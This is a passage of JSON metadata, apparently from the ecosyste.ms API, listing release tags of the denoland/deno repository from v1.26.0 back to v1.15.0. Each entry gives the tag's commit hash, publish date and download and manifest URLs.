osts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","ki